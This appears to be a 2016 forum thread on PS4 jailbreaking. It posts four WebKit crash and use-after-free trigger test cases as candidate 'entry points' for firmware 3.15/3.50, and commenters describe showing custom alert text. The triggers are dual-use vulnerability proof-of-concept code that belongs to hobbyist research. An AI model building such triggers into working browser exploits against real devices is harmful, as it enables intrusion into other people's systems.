PS4 Jailbreaking | Thread starter: mcmrc1 | Start date: Apr 10, 2016 at 12:04 PM
Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.
@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers :)
1. Entry point:
Code:
<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>
2. Entry point:
Code:
<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>
Also the source code from the WebKit from Sony ;)
3. Entry Point:
Code:
<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
><object onbeforeload="eventhandler2()"><iframe>
4. Entry Point:
Code:
<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>

Comments

I was playing around with zecoxao's release, and got at least as far as making custom messages on 3.50 FW. It's just the alert message only. I'm going to play around a bit more to see what else I can get it to do.

For some reason an emulator that uses JavaScript doesn't want to work, or works at 10 fps. I dunno man really, I'm just goofing around with my setup trying to see what is exploitable and easy to get working right. I'm in no way trying to present myself as an elite. I know my way around (I'll leave it at that), but I'm sure with a little tweaking JSNES would run fine through the browser, as the PS4 web browser is more capable than the PS3 browser. The PS4 in theory will support canvasing:
Code:
<canvas id="example" width="200" height="200">
This text is displayed if your browser does not support HTML5 Canvas.
</canvas>
Using JavaScript, you can draw on the canvas:

var example = document.getElementById('example');
var context = example.getContext('2d');
context.fillStyle = 'red';
context.fillRect(30, 30, 50, 50);

This code draws a red rectangle on the screen.

The Canvas API also provides save() and restore(), for saving and restoring all the canvas context’s attributes.
I have been looking around at my drive and having some nice experiences swapping files. There is a way to break the master toolchain, even compile your own .diffs.
Researching this to the bone for hours on end. Looking at other people's code, etc.
You would be surprised how just downright sloppy the security is at the higher levels. With enough research you can even compile your own toolchain. Get into their OWN CLANG. It's ridiculous. They didn't think the PS4 would get pwned so quickly. The guys that are putting their work out are doing amazing jobs and they will get closer every day until they pwn it.
 
@GritNGrind You got a "hello world"? Wow. Can you go further in depth and write a tutorial on what you did so people can take it in a different direction?

Custom TEXT only. I used zecoxao's code with said FOO, and changed that to whatever I could think of and tried to run it, and it did. Probably bad choice of words. Ha! Just custom text only. I'm the same as DrPhuz, I'm just tinkering around with the guys that did the work, and seeing what limits it has. It's really nice to see all the work that's being done.
 
Man, would love to, but got to hit the sack (damn real work!). I can't wait to get back on some of this tomorrow though. I can get it to do math, text boxes, etc... just simple stuff so far. Seems very limited on memory though. Maybe they can find a way to break out of that.
